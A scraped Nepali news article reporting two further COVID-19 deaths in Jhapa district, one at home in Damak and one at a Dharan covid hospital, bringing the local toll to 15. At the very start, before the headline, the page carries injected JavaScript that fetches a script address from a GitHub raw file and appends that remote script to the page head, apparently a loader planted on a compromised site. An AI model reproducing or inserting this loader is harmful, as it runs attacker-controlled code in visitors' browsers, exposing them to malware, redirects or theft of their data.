;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); झापामा कोरोना संक्रमणबाट थप दुई जनाको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • झापामा कोरोना संक्रमणबाट थप दुई जनाको मृत्यु
समाचार

झापामा कोरोना संक्रमणबाट थप दुई जनाको मृत्यु

 

कात्तिक ०१

झापामा कोरोना संक्रमणका कारण थप २ जनाको मृत्यु भएको छ ।

मृत्यु हुनेमा दमक नगरपालिकाका ५८ वर्षिय र शिवसताक्षी नगरपालिकाका ५६ वर्षीय पुरुष रहेका छन् ।

५८ बर्षीय पुरुषको घरमा मृत्यु भएको हो भने ५६ बर्षिय पुरुषको वीपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठान धरानको कोभिड अस्पतालमा मृत्यु भएको हो । यो संगै झापामा कोरोना संक्रमणबाट मृत्यु हुनेको संख्या १५ पुगेको छ ।

फेसबुक प्रतिक्रियाहरु